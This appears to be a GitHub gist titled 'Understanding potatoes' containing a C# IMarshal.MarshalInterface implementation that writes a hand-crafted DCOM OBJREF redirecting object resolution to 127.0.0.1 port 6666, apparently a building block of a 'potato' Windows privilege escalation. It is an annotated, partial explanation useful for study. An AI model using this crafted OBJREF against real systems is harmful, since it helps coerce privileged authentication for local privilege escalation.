Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings

FrankSpierings/README.md

Last active October 10, 2024 08:28
Show Gist options
  • Save FrankSpierings/87eb52567c0ddc9012da756e16cac487 to your computer and use it in GitHub Desktop.
Save FrankSpierings/87eb52567c0ddc9012da756e16cac487 to your computer and use it in GitHub Desktop.
Download ZIP
Understanding potatoes
Raw
README.md

The Marshalled OBJREF

        unsafe void IMarshal.MarshalInterface(Windows.Win32.System.Com.IStream pStm, Guid* riid, void* pv, uint dwDestContext, void* pvDestContext, uint mshlflags)
        {
            uint written;
            // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/fe6c5e46-adf8-4e34-a8de-3f756c875f31
            // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-oaut/58504586-e4af-44a3-be04-f1dc281b7429
            byte[] data = {
                // OBJREF
                0x4D, 0x45, 0x4F, 0x57, // MEOW
                0x01, 0x00, 0x00, 0x00, // Flags = OBJREF_STANDARD
                0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, // IID_IUnknown
                    // OBJREF_STANDARD: std
                    0x00, 0x00, 0x00, 0x00, // Flags
                    0x01, 0x00, 0x00, 0x00, // cPublicRefs (count)
                    0x94, 0x09, 0x34, 0x76, 0xC0, 0xF0, 0x15, 0xD8, // Object Exporter ID (OXID)
                    0x19, 0x8F, 0x4A, 0xA2, 0xCE, 0x05, 0x60, 0x86, // OID of Object
                    0xA3, 0x2A, 0x0F, 0x09, 0x24, 0xE8, 0x70, 0x2A, 0x85, 0x65, 0x3B, 0x33, 0x97, 0xAA, 0x9C, 0xEC, // Interface Pointer ID (IPID)
                    // OBJREF_STANDARD: saResAddr
                    0x16, 0x00, // wNumEntries
                    0x12, 0x00, // wSecurityOffset
                    0x07, 0x00, // wTowerId
                    // UTF-16-LE: 127.0.0.1[6666]
                    0x31, 0x00, 0x32, 0x00, 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, // "127.0.0.1"
                    0x5B, 0x00, 0x36, 0x00, 0x36, 0x00, 0x36, 0x00, 0x36, 0x00, 0x5D, 0x00, 0x00, 0x00, // "[6666]\x00"
                    0x00, 0x00, // nullterm1
                    0x0A, 0x00, // wAuthnSvc
                    0xFF, 0xFF, // Reserved, must be 0xffff
                    0x00, 0x00, // aPrincName, Null-terminated string
                    0x00, 0x00  // nullterm2
            };
            pStm.Write(&data, (uint)data.Length, &written);
        }
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment